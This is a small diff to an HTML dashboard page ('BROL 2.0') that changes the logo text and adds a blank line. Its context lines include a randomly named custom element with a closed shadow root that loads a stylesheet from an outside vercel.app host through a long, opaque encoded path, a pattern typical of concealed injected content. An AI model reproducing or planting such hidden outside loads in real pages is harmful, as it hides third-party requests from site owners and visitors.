--- a/index.html
+++ b/index.html
@@ -649,7 +649,7 @@
 <header>
   <div class="header-left">
     <a href="https://dl.ouaisfi.eu/usba/1/2/3/9/9/9/" ><div class="logo-frame">
-      <div class="logo-inner">BROL</div>
+      <div class="logo-inner">flxy</div>
     </div></a>
     <div class="header-titles">
       <div class="title-main">BROL 2.0 – Dashboard</div>
@@ -1488,6 +1488,7 @@
 
 
 <pal-qyzvodoehdnk><template shadowrootmode="closed"><link rel="stylesheet" href="https://rg-ashy.vercel.app/dmO03-Eu0pGz9OVqZ2WQ720GqVxXfyTU3ZJ1WipKEtFcv-03ztDpDhQHuHs-N9r5h9BbkeazMrVLmRdBvhavDsJFrvRqgCs2vEq9thmrtdnV4IypSRLtkUQdIDCId4kpGahKXK3UNoClcvql8DeRRQifGAcxEnmlOMEd1GPYBGQGVTziiekDomw6drUCvf1rBJvBn7MwYYg8wRC2fCQQRFFYALWplyb0KZBotwSB4Mh4t1qJKjnjQXkfTA6Rzv5EcRWy25yLZ5hQ3yafYoN8cfEytUhvsInWT9ubxS3-2DDedK-92SH4Nlr_jR_zQ6bDwWE_WvJkPcTINtCqwxSkyZ-yEME322mdzkTJCdYxQjaP0h-N7leSldk6rIVfQjoGx2H6WaPr3gv80MbQdg"></template></pal-qyzvodoehdnk><style></style></body></html>
+
 
 
 
